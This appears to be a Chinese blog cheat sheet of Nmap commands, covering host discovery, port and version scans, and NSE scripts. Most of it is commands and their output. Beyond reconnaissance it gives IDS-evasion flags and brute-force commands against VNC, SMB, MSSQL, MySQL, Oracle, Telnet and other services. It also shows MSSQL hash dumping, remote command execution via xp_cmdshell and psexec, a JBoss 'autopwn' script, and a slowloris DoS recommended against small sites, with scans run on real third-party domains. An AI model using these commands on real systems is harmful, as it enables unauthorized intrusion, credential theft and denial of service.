Nmap常用基础命令

发表于 更新于 分类于 本文字数: 15k
Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端,确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统,正如大多数被用于网络安全的工具,Nmap也是不少黑客及骇客爱用的工具,系统管理员可以利用Nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用Nmap来搜集目标电脑的网络设定,从而计划攻击的方法.

Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端,确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统,正如大多数被用于网络安全的工具,Nmap也是不少黑客及骇客爱用的工具,系统管理员可以利用Nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用Nmap来搜集目标电脑的网络设定,从而计划攻击的方法.


主机发现扫描

批量Ping探测: -sP参数,用来批量扫描一个网段的主机存活数,这里的结果只会显示在线的主机.

[root@localhost ~]# nmap -sP 192.168.1.0/24 > scan.log
[root@localhost ~]# cat scan.log | grep "Nmap scan" | awk '{print $5}'

跳过Ping探测: 有些主机关闭了ping检测,所以可以使用-P0跳过ping的探测,这样可加快扫描速度.

[root@localhost ~]# nmap -P0 192.168.1.7

计算网段主机IP: 仅列出指定网段上的每台主机,不发送任何报文到目标主机.

[root@localhost ~]# nmap -sL 192.168.1.0/24 > scan.log
[root@localhost ~]# cat scan.log | grep "Nmap scan" | awk '{print $5}'

扫描在线主机: 扫描一个网段的在线主机列表,功能类似于批量ping检测存活主机.

[root@localhost ~]# nmap -sn 27.201.193.0/24
[root@localhost ~]# cat scan.log | grep "Nmap scan" | awk '{print $5}'

扫描IP地址范围: 指定探测的网段,看是否在线.

[root@localhost ~]# nmap -sP 192.168.1.1-10
[root@localhost ~]# nmap -sP 27.201.193.100-200

探测开放端口(TCP/UDP): 探测目标主机开放的端口,可指定一个以逗号分隔的端口列表,如(-pS22,443,80).

[root@localhost ~]# nmap -pS22,80,443 192.168.1.10              // TCP探测
[root@localhost ~]# nmap -pU22,80,443 192.168.1.10              // UDP探测
[root@localhost ~]# nmap -p smtp,http,https 192.168.1.10

探测主机(SYN/TCP/UDP)扫描: SYN半开放扫描,TCP开放扫描.

[root@localhost ~]# nmap -sS 192.168.1.10       //SYN扫描
[root@localhost ~]# nmap -sT 192.168.1.10       // tcp
[root@localhost ~]# nmap -sU 192.168.1.10       // UDP扫描
[root@localhost ~]# nmap -sA 192.168.1.10       // TCP ACK扫描

主机协议探测: IP协议扫描,可以确定目标机支持哪些IP协议(TCP, ICMP, IGMP).

[root@localhost ~]# nmap -sO 192.168.1.10 | grep '^[0-9]'
1        open  icmp
6        open  tcp
7        open  udp

探测目标系统: 扫描探测目标主机操作系统,这里结果仅供参考有时候并不准确.

[root@localhost ~]# nmap -O 192.168.1.10 | grep "Running:"
Running: Microsoft Windows 2000 | XP

探测服务版本: 用于扫描目标主机服务的具体版本号.

[root@localhost ~]# nmap -sV 192.168.1.10 | grep '^[0-9]'
80/tcp   open   http            Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
3306/tcp open   mysql           MySQL 5.5.53
139/tcp  open   netbios-ssn
443/tcp  open   ssl/http        VMware VirtualCenter Web service
445/tcp  closed microsoft-ds
912/tcp  open   vmware-auth     VMware Authentication Daemon 1.0 (Uses VNC, SOAP)

跟踪报文(tracert): 跟踪发送和接收报文的数据流向.

[root@localhost ~]# nmap --packet-trace 192.168.1.10
SENT (4.7014s) TCP 192.168.1.30:50000 > 192.168.1.10:3527 S
SENT (4.7100s) TCP 192.168.1.30:50000 > 192.168.1.10:4446 S

输出本机接口: 输出检测到的接口列表和系统路由

root@localhost ~]# nmap --iflist 192.168.1.10

扫描多台主机: 一次性扫描多台目标主机,与网段扫描不相同.

[root@localhost ~]# nmap -sP 192.168.1.10 192.168.1.20
[root@localhost ~]# nmap -sP 192.168.1.10 192.168.1.20 192.168.1.30

扫描时排除主机:

nmap 10.0.1.161-162  --exclude 10.0.1.162       // 排除单个主机
nmap 10.0.1.161-163 --exclude 10.0.1.162-163    // 排除连续主机
nmap 10.0.1.161-163 --exclude 10.0.1.161,10.0.1.163  //排除分散主机
nmap 10.0.1.161-163  --excludefile ex.txt            // 排除文件里的主机

控制扫描时间: 调整探测报文的时间间隔,防止在单一主机上等待时间过长.

[root@localhost ~]# nmap --scan-delay 1 192.168.1.10
[root@localhost ~]# nmap --max-scan-delay 1 192.168.1.10   // 表示最多等待1秒
[root@localhost ~]# nmap --max-retries 1 192.168.1.10      // 数据包最多重传1次

输出指定格式: 通过相关选项,可以让Nmap输出指定的文件格式.

[root@localhost ~]# nmap -oX lyshark.xml 192.168.1.10     // 以XML格式输出扫描结果
[root@localhost ~]# nmap -oN lyshark.log 192.168.1.10     // 以标准格式输出到文本
[root@localhost ~]# nmap -oG lyshark.log 192.168.1.10     // 以Grep可识别的格式输出

导入扫描文件: 从一个文件中导入IP地址,并进行扫描.

[root@localhost ~]# cat lyshark.log
localhost
www.baidu.com
192.168.1.7

[root@localhost ~]# nmap -iL lyshark.log

防火墙的规避

规避IDS检测: 通过设置时间模板(<Paranoid=0|Sneaky=1)的方式,来规避IDS的检测.

[root@localhost ~]# nmap -T0 192.168.1.10
[root@localhost ~]# nmap -T1 192.168.1.10

报文分段探测: 将TCP头分段在几个包中,使得包过滤器、IDS以及其它工具的检测更加困难.

[root@localhost ~]# nmap -f 192.168.1.10            // 自动分段
[root@localhost ~]# nmap --mtu 4/8/16 192.168.1.10  // 自定义分段,必须是4的倍数

使用诱饵绕过: 使用诱饵隐蔽扫描,此处也可用自己的真实IP作为诱饵.

[root@localhost ~]# nmap -D 192.168.1.1 192.168.1.10

使用扫描脚本

Nmap不仅用于端口扫描,服务检测,其还具有强大的脚本功能,利用Nmap Script可以快速探测服务器,一般情况下,常用的扫描脚本会放在/usr/share/nmap/script目录下,并且脚本扩招名为*.nse后缀的,接下来将介绍最常用的扫描脚本.

扫描WEB敏感目录: 通过使用--script=http-enum.nse可以扫描网站的敏感目录.

[root@localhost ~]# nmap -p 80 --script=http-enum.nse www.mkdirs.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 01:49 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000010s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
| http-enum:
|   /login.php: Possible admin folder
|   /robots.txt: Robots file
|   /config/: Potentially interesting folder w/ directory listing
|   /docs/: Potentially interesting folder w/ directory listing
|   /external/: Potentially interesting folder w/ directory listing
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds

绕开鉴权: 负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令.

[root@localhost ~]# nmap --script=auth www.mkdirs.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:16 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000090s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0               6 Oct 30 19:45 pub
22/tcp   open  ssh
25/tcp   open  smtp
| smtp-enum-users:
|_  root
80/tcp   open  http
| http-domino-enum-passwords:
|_  ERROR: No valid credentials were found
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds

默认脚本扫描: 脚本扫描,主要是搜集各种应用服务的信息,收集到后可再针对具体服务进行攻击.

[root@localhost ~]# nmap --script=default www.mkdirs.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:21 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000010s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0               6 Oct 30 19:45 pub
22/tcp   open  ssh
| ssh-hostkey: 2048 c2:89:44:fc:e3:1b:5a:65:a1:6e:11:34:73:6d:d5:04 (RSA)
|_256 54:0e:d4:47:2f:b2:d4:2b:33:b6:d8:35:66:2d:a2:aa (ECDSA)
3306/tcp open  mysql
| mysql-info: Protocol: 10
| Version: 5.5.60-MariaDB
| Thread ID: 10408
| Status: Autocommit
|_Salt: <D"y]F(2

Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds

检测常见漏洞: 通过使用--script=luln,可以扫描网站的常见漏洞,以及网页的目录结构.

[root@localhost ~]# nmap --script=vuln www.mkdirs.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:24 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000017s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp   open  http
| http-enum:
|   /login.php: Possible admin folder
|   /robots.txt: Robots file
|   /config/: Potentially interesting folder w/ directory listing
|   /docs/: Potentially interesting folder w/ directory listing
|   /external/: Potentially interesting folder w/ directory listing
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-fileupload-exploiter:
|_http-frontpage-login: false
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

内网服务探测: 通过使用--script=broadcast,可以实现在局域网内探查更多服务开启状况.

[root@localhost ~]# nmap -n -p445 --script=broadcast 127.0.0.1

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:28 EDT
Pre-scan script results:
| broadcast-dhcp-discover:
|   IP Offered: 192.168.1.14
|   Server Identifier: 192.168.1.1
|   Subnet Mask: 255.255.255.0
|   Router: 192.168.1.1
|_  Domain Name Server: 192.168.1.1
| broadcast-eigrp-discovery:
|_ ERROR: Couldn't get an A.S value.
| broadcast-listener:
|   ether
|       ARP Request
|         sender ip    sender mac         target ip
|         192.168.1.1  43:72:23:04:56:21  192.168.1.2
|         192.168.1.2  B4:8C:28:BE:4C:34  192.168.1.1
|       EIGRP Update
........

进行WhoIS查询: 通过使用--script whois模块,可以查询网站的简单信息.

[root@localhost ~]# nmap --script whois www.baidu.com

Host script results:
| whois: Record found at whois.apnic.net
| inetnum: 61.135.0.0 - 61.135.255.255
| netname: UNICOM-BJ
| descr: China Unicom Beijing province network
| country: CN
| person: ChinaUnicom Hostmaster
|_email: hqs-ipabuse@chinaunicom.cn

Nmap done: 1 IP address (1 host up) scanned in 4.76 seconds

详细WhoIS解析: 利用第三方的数据库或资源,查询详细的WhoIS解析情况.

[root@localhost ~]# nmap --script external www.baidu.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-30 23:31 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.018s latency).
|_http-robtex-shared-ns: ERROR: Script execution failed (use -d to debug)
| ip-geolocation-geoplugin:
| 61.135.169.125 (www.baidu.com)
|   coordinates (lat,lon): 39.9288,116.3889
|_  state: Beijing, China
|_ip-geolocation-maxmind: ERROR: Script execution failed (use -d to debug)
| whois: Record found at whois.apnic.net
| inetnum: 61.135.0.0 - 61.135.255.255
| netname: UNICOM-BJ
| descr: China Unicom Beijing province network
|_country: CN
.....

发现内网网关: 通过使用--script=broadcast-netbios-master-browser可以发现内网网关的地址.

[root@localhost ~]# nmap --script=broadcast-netbios-master-browser 192.168.1.1

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:05 EDT
Pre-scan script results:
| broadcast-netbios-master-browser:
| ip           server          domain
|_192.168.1.2  Web-Server     WORKGROUP
Nmap scan report for 192.168.1.1
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT     STATE    SERVICE
80/tcp   filtered http
1900/tcp open     upnp
MAC Address: 42:1C:1B:E7:B1:B2 (TP-Link)

发现WEB中Robots文件: 通过使用--script=http-robots.txt.nse可以检测到robots文件内容.

[root@localhost scripts]# nmap --script=http-robots.txt.nse www.baidu.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:12 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.019s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.121
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
| http-robots.txt: 9 disallowed entries
| /baidu /s? /ulink? /link? /home/news/data/ /shifen/
|_/homepage/ /cpro /
443/tcp open  https
| http-robots.txt: 9 disallowed entries
| /baidu /s? /ulink? /link? /home/news/data/ /shifen/
|_/homepage/ /cpro /

Nmap done: 1 IP address (1 host up) scanned in 5.06 seconds

检查WEB服务器时间: 检查web服务器的当前时间.

[root@localhost scripts]# nmap -p 443 --script http-date.nse www.baidu.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:16 EDT
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.017s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT    STATE SERVICE
443/tcp open  https
|_http-date: Sun, 31 Mar 2019 06:16:53 GMT; 0s from local time.

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

执行DOS攻击: dos攻击,对于处理能力较小的站点还挺好用的.

[root@localhost ~]# nmap --script http-slowloris --max-parallelism 1000 www.mkdirs.com
Warning: Your max-parallelism (-M) option is extraordinarily high, which can hurt reliability

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:21 EDT

检查DNS子域: 检查目标ns服务器是否允许传送,如果能,直接把子域拖出来就好了.

[root@localhost scripts]# nmap -p 53 --script dns-zone-transfer.nse -v www.baidu.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:28 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Ping Scan at 02:28
Scanning www.baidu.com (61.135.169.121) [4 ports]
Completed Ping Scan at 02:28, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:28
Completed Parallel DNS resolution of 1 host. at 02:28, 0.01s elapsed
Initiating SYN Stealth Scan at 02:28
Scanning www.baidu.com (61.135.169.121) [1 port]
Completed SYN Stealth Scan at 02:28, 0.20s elapsed (1 total ports)
NSE: Script scanning 61.135.169.121.
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.016s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT   STATE    SERVICE
53/tcp filtered domain

NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
           Raw packets sent: 6 (240B) | Rcvd: 1 (28B)

查询WEB旁站: 旁站查询,ip2hosts接口该接口似乎早已停用,如果想继续用,可自行到脚本里把接口部分的代码改掉.

[root@localhost scripts]# nmap -p80 --script hostmap-ip2hosts.nse www.baidu.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 02:29 EDT
Nmap scan report for www.baidu.com (61.135.169.121)
Host is up (0.017s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.125
PORT   STATE SERVICE
80/tcp open  http

Host script results:
| hostmap-ip2hosts:
|_  hosts: Error: could not GET http://www.ip2hosts.com/csv.php?ip=61.135.169.121

Nmap done: 1 IP address (1 host up) scanned in 5.89 seconds

口令爆破模块

暴力破解DNS记录: 这里以破解百度的域名为例子,由于内容较多这里简化显示.

[root@localhost scripts]# nmap --script=dns-brute.nse www.baidu.com

Starting Nmap 6.40 ( http://nmap.org ) at 2019-03-31 03:19 EDT
Nmap scan report for www.baidu.com (61.135.169.125)
Host is up (0.018s latency).
Other addresses for www.baidu.com (not scanned): 61.135.169.121
Not shown: 998 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Host script results:
| dns-brute:
|   DNS Brute-force hostnames
|     lab.baidu.com - 180.149.144.192
|     lab.baidu.com - 180.149.132.122
|     corp.baidu.com - 123.129.254.12
|_    log.baidu.com - 10.26.39.14

Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds

内网VNC扫描: 通过使用脚本,检查VNC版本等一些敏感信息.

[root@localhost ~]# nmap --script=realvnc-auth-bypass 127.0.0.1                                            #检查VNC版本
[root@localhost ~]# nmap --script=vnc-auth 127.0.0.1                                                       #检查VNC认证方式
[root@localhost ~]# nmap --script=vnc-info 127.0.0.1                                                       #获取VNC信息
[root@localhost ~]# nmap --script=vnc-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1  #暴力破解VNC密码

内网SMB扫描: 检查局域网中的Samba服务器,以及对服务器的暴力破解.

[root@localhost ~]# nmap --script=smb-brute.nse 127.0.0.1                                                            #简单尝试破解SMB服务
[root@localhost ~]# nmap --script=smb-check-vulns.nse --script-args=unsafe=1 127.0.0.1                               #SMB已知几个严重漏
[root@localhost ~]# nmap --script=smb-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1            #通过传递字段文件,进行暴力破解
[root@localhost ~]# nmap -p445 -n --script=smb-psexec --script-args=smbuser=admin,smbpass=1233 127.0.0.1             #查询主机一些敏感信息:nmap_service
[root@localhost ~]# nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1  #查看会话
[root@localhost ~]# nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1   #查看系统信息

MSSQL扫描: 检查局域网中的SQL Server服务器,以及对服务器的暴力破解.

[root@localhost ~]# nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1  #暴力破解MSSQL密码
[root@localhost ~]# nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 127.0.0.1   #dumphash值
[root@localhost ~]# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4 xp_cmdshell      #执行命令

MYSQL扫描: 检查局域网中的MySQL服务器,以及对服务器的暴力破解.

[root@localhost ~]# nmap -p3306 --script=mysql-empty-password.nse 127.0.0.1                                             #扫描root空口令
[root@localhost ~]# nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 127.0.0.1                         #列出所有用户
[root@localhost ~]# nmap -p3306 --script=mysql-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1  #暴力破解MYSQL口令

Oracle扫描: 检查局域网中的Oracle服务器,以及对服务器的暴力破解.

[root@localhost ~]# nmap --script=oracle-sid-brute -p 1521-1560 127.0.0.1    #oracle sid扫描
[root@localhost ~]# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 127.0.0.1     #oracle弱口令破解

爆破Telnet:

nmap -p 23 --script telnet-brute \
           --script-args userdb=myusers.lst,passdb=.mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关

nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync

nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解

nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解

nmap -sU --script snmp-brute 192.168.137.4            snmp破解

nmap -sV --script=telnet-brute 192.168.137.4          telnet破解

nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>  jboss autopwn

nmap --script=http-methods.nse 192.168.137.4 检查http方法

nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections 

nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4
nmap -iR 1000 -sS -PS80 -p 80 -oG nmap.txt

Nmap 变成漏扫使用https://github.com/scipag/vulscan 下载项目,并整个解压到nmap 的script目录下,然后执命令

nmap -sV --script=vulscan/vulscan.nse
#使用默认的库进行漏洞扫描
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=cve.csv [ip]
#使用特定的库cve.csv扫描
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=exploitdb.csv [ip]
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=securitytracker.csv [ip]
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=xforce.csv [ip]
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv [ip]
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=openvas.csv [ip]
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=xforce.csv [ip]
nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=osvdb.csv [ip]